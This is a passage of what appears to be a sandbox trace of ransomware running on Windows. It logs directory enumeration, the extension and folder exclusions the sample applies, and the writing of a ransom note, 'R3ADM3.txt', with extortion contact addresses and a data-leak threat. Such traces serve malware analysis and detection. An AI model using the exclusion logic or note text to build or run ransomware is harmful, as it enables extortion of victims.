cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0139.344] lstrcmpW (lpString1="hmmapi.dll", lpString2=".") returned 1 [0139.344] lstrcmpW (lpString1="hmmapi.dll", lpString2="..") returned 1 [0139.344] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".UAKXC") returned 0x0 [0139.345] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".exe") returned 0x0 [0139.345] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".dll") returned=".dll" [0139.345] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f46f7c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xd7f46f7c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xd7f6d0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0139.345] lstrcmpW (lpString1="ie8props.propdesc", lpString2=".") returned 1 [0139.345] lstrcmpW (lpString1="ie8props.propdesc", lpString2="..") returned 1 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".UAKXC") returned 0x0 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".exe") returned 0x0 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".dll") returned 0x0 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".lnk") returned 0x0 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".sys") returned 0x0 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".msi") returned 0x0 [0139.345] StrStrIW (lpFirst="ie8props.propdesc", lpSrch="R3ADM3.txt") returned 0x0 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec220 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec288 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xee0108 [0139.345] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec288 | out: hHeap=0xea0000) returned 1 [0139.345] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec220 | out: hHeap=0xea0000) returned 1 [0139.345] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd6e0 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc70 [0139.345] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd768 [0139.346] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd6e0 | out: hHeap=0xea0000) returned 1 [0139.346] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0139.346] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22549a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22549a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb22a0c69, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0139.346] lstrcmpW (lpString1="iecompat.dll", lpString2=".") returned 1 [0139.346] lstrcmpW (lpString1="iecompat.dll", lpString2="..") returned 1 [0139.346] StrStrIW (lpFirst="iecompat.dll", lpSrch=".UAKXC") returned 0x0 [0139.346] StrStrIW (lpFirst="iecompat.dll", lpSrch=".exe") returned 0x0 [0139.346] StrStrIW (lpFirst="iecompat.dll", lpSrch=".dll") returned=".dll" [0139.346] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22ecf2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22ecf2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23391ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0139.346] lstrcmpW (lpString1="iedvtool.dll", lpString2=".") returned 1 [0139.346] lstrcmpW (lpString1="iedvtool.dll", lpString2="..") returned 1 [0139.346] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".UAKXC") returned 0x0 [0139.346] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".exe") returned 0x0 [0139.346] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".dll") returned=".dll" [0139.346] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb273d712, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb273d712, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0139.346] lstrcmpW (lpString1="ieinstal.exe", lpString2=".") returned 1 [0139.346] lstrcmpW (lpString1="ieinstal.exe", lpString2="..") returned 1 [0139.346] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".UAKXC") returned 0x0 [0139.346] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".exe") returned=".exe" [0139.347] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27a3bdc, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb27a3bdc, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x6b1085f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0139.347] lstrcmpW (lpString1="ielowutil.exe", lpString2=".") returned 1 [0139.347] lstrcmpW (lpString1="ielowutil.exe", lpString2="..") returned 1 [0139.347] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".UAKXC") returned 0x0 [0139.347] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".exe") returned=".exe" [0139.347] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb23391ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb23391ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23854ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0139.347] lstrcmpW (lpString1="ieproxy.dll", lpString2=".") returned 1 [0139.348] lstrcmpW (lpString1="ieproxy.dll", lpString2="..") returned 1 [0139.348] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".UAKXC") returned 0x0 [0139.348] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".exe") returned 0x0 [0139.348] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".dll") returned=".dll" [0139.348] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27fbdf3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb27fbdf3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0139.348] lstrcmpW (lpString1="IEShims.dll", lpString2=".") returned 1 [0139.348] lstrcmpW (lpString1="IEShims.dll", lpString2="..") returned 1 [0139.348] StrStrIW (lpFirst="IEShims.dll", lpSrch=".UAKXC") returned 0x0 [0139.348] StrStrIW (lpFirst="IEShims.dll", lpSrch=".exe") returned 0x0 [0139.348] StrStrIW (lpFirst="IEShims.dll", lpSrch=".dll") returned=".dll" [0139.348] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e87a7f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2e87a7f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2eadbdf, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa4510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0139.348] lstrcmpW (lpString1="iexplore.exe", lpString2=".") returned 1 [0139.348] lstrcmpW (lpString1="iexplore.exe", lpString2="..") returned 1 [0139.348] StrStrIW (lpFirst="iexplore.exe", lpSrch=".UAKXC") returned 0x0 [0139.348] StrStrIW (lpFirst="iexplore.exe", lpSrch=".exe") returned=".exe" [0139.348] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a5d3f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a5d3f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2aa96b8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0139.348] lstrcmpW (lpString1="jsdbgui.dll", lpString2=".") returned 1 [0139.348] lstrcmpW (lpString1="jsdbgui.dll", lpString2="..") returned 1 [0139.348] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".UAKXC") returned 0x0 [0139.348] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".exe") returned 0x0 [0139.348] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".dll") returned=".dll" [0139.348] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d665b0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d665b0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0139.348] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2=".") returned 1 [0139.349] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="..") returned 1 [0139.349] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".UAKXC") returned 0x0 [0139.349] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".exe") returned 0x0 [0139.349] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".dll") returned=".dll" [0139.349] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d8c70f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d8c70f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0139.349] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2=".") returned 1 [0139.349] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="..") returned 1 [0139.349] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".UAKXC") returned 0x0 [0139.349] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".exe") returned 0x0 [0139.349] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".dll") returned=".dll" [0139.349] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2aa96b8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2aa96b8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2acf818, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0139.349] lstrcmpW (lpString1="jsprofilerui.dll", lpString2=".") returned 1 [0139.349] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="..") returned 1 [0139.349] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".UAKXC") returned 0x0 [0139.349] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".exe") returned 0x0 [0139.349] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".dll") returned=".dll" [0139.349] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4239426f, ftCreationTime.dwHighDateTime=0x1ca0405, ftLastAccessTime.dwLowDateTime=0x4239426f, ftLastAccessTime.dwHighDateTime=0x1ca0405, ftLastWriteTime.dwLowDateTime=0x67fe631c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x40df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0139.349] lstrcmpW (lpString1="msdbg2.dll", lpString2=".") returned 1 [0139.349] lstrcmpW (lpString1="msdbg2.dll", lpString2="..") returned 1 [0139.349] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".UAKXC") returned 0x0 [0139.349] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".exe") returned 0x0 [0139.349] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".dll") returned=".dll" [0139.349] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b0ea3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x68b0ea3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x68b34b9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x56df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0139.350] lstrcmpW (lpString1="pdm.dll", lpString2=".") returned 1 [0139.350] lstrcmpW (lpString1="pdm.dll", lpString2="..") returned 1 [0139.350] StrStrIW (lpFirst="pdm.dll", lpSrch=".UAKXC") returned 0x0 [0139.350] StrStrIW (lpFirst="pdm.dll", lpSrch=".exe") returned 0x0 [0139.350] StrStrIW (lpFirst="pdm.dll", lpSrch=".dll") returned=".dll" [0139.350] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x583f5c30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x583f5c30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x583f5c30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.350] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.350] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.350] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.350] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9bb8508b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9bb8508b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0139.350] lstrcmpW (lpString1="SIGNUP", lpString2=".") returned 1 [0139.350] lstrcmpW (lpString1="SIGNUP", lpString2="..") returned 1 [0139.350] StrStrIW (lpFirst="SIGNUP", lpSrch="tmp") returned 0x0 [0139.350] StrStrIW (lpFirst="SIGNUP", lpSrch="winnt") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="temp") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="thumb") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="$Recycle.Bin") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="System Volume Information") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="Boot") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="Windows") returned 0x0 [0139.351] StrStrIW (lpFirst="SIGNUP", lpSrch="Trend Micro") returned 0x0 [0139.351] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec220 [0139.351] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec288 [0139.351] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec220 | out: hHeap=0xea0000) returned 1 [0139.351] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece28 [0139.351] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec220 [0139.351] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec288 | out: hHeap=0xea0000) returned 1 [0139.351] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0139.351] lstrcmpW (lpString1="sqmapi.dll", lpString2=".") returned 1 [0139.351] lstrcmpW (lpString1="sqmapi.dll", lpString2="..") returned 1 [0139.351] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".UAKXC") returned 0x0 [0139.351] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".exe") returned 0x0 [0139.351] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".dll") returned=".dll" [0139.351] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8304c4e0, ftCreationTime.dwHighDateTime=0x1d57ccf, ftLastAccessTime.dwLowDateTime=0x3ae5b1c0, ftLastAccessTime.dwHighDateTime=0x1d599c0, ftLastWriteTime.dwLowDateTime=0x3ae5b1c0, ftLastWriteTime.dwHighDateTime=0x1d599c0, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="trader_tn.exe", cAlternateFileName="TRADER~1.EXE")) returned 1 [0139.352] lstrcmpW (lpString1="trader_tn.exe", lpString2=".") returned 1 [0139.352] lstrcmpW (lpString1="trader_tn.exe", lpString2="..") returned 1 [0139.352] StrStrIW (lpFirst="trader_tn.exe", lpSrch=".UAKXC") returned 0x0 [0139.352] StrStrIW (lpFirst="trader_tn.exe", lpSrch=".exe") returned=".exe" [0139.352] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8304c4e0, ftCreationTime.dwHighDateTime=0x1d57ccf, ftLastAccessTime.dwLowDateTime=0x3ae5b1c0, ftLastAccessTime.dwHighDateTime=0x1d599c0, ftLastWriteTime.dwLowDateTime=0x3ae5b1c0, ftLastWriteTime.dwHighDateTime=0x1d599c0, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="trader_tn.exe", cAlternateFileName="TRADER~1.EXE")) returned 0 [0139.352] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee53f0 | out: hHeap=0xea0000) returned 1 [0139.352] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6ba0 | out: hHeap=0xea0000) returned 1 [0139.352] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.352] Sleep (dwMilliseconds=0x32) [0139.402] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0139.402] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0139.402] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ba0 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0139.402] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec080 [0139.402] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0139.402] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.402] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6ba0 | out: hHeap=0xea0000) returned 1 [0139.402] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\java\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.403] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.403] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.405] CloseHandle (hObject=0x210) returned 1 [0139.405] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.405] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0139.405] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5848e1b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5848e1b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.405] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5848e1b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5848e1b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.405] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre7", cAlternateFileName="")) returned 1 [0139.405] lstrcmpW (lpString1="jre7", lpString2=".") returned 1 [0139.405] lstrcmpW (lpString1="jre7", lpString2="..") returned 1 [0139.405] StrStrIW (lpFirst="jre7", lpSrch="tmp") returned 0x0 [0139.405] StrStrIW (lpFirst="jre7", lpSrch="winnt") returned 0x0 [0139.405] StrStrIW (lpFirst="jre7", lpSrch="temp") returned 0x0 [0139.406] StrStrIW (lpFirst="jre7", lpSrch="thumb") returned 0x0 [0139.406] StrStrIW (lpFirst="jre7", lpSrch="$Recycle.Bin") returned 0x0 